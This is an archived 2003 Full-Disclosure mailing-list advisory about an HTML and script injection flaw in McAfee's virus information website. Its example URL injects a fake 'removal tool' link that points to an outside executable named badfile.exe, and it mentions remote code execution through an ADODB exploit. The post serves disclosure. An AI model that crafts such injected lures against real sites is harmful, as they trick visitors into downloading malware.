[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Code executing in McAfee's virus information websites

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] Code executing in McAfee's virus information websites
From: Redaktion-Kryptocrew <momolly@xxxxxxxxxxxxx>
Date: Wed, 3 Sep 2003 08:09:09 +0200


Vulnerability:     Code executing in McAfee's virus information websites
Found:             29 Aug 2003
Vendor:            McAfee Security
Vendor notified:   02 Sept 2003
Vendor response:   no
Public release:    03 Sept 2003



We were surfing McAfee's virus information sites and possibilities to inject 
even
harmful
scripts. We're testing successfully executed remote code using the ADODB
exploit.
McAfee overlooked this fault in their virus Information websites (all
languages!).



[Example]:
http://de.mcafee.com/virusInfo/default.asp?id=helpCenter&hcName=Sobig<br><br><b>if%20you%20recieve%20a%20error%20above%20you%20must</b><br><h3><a%20href=http://www.kryptocrew.de/badfile.exe>download%20this%20removal%20tool!%20NOW!!!</a><br>testing%20your%20saftey...%20%20test



Thanks to:
Donnie Werner (exploitlabs.com), Roland Brecht (kryptocrew.de) & Alexander 
Mueller
(ec-security.com)


Regards
G.P

--
======================================================================

G.P
Online-Redaktion
                  
===============================

Kryptocrew
.: your security advisor team :.           mailto:momolly@xxxxxxxxxxxxx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
Next by Date: RE: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
Previous by thread: [Full-Disclosure] The Worm tard who got busted
Next by thread: [Full-Disclosure] MDKSA-2003:088 - Updated pam_ldap packages fix vulnerability with pam filtering
Index(es):
- Date
- Thread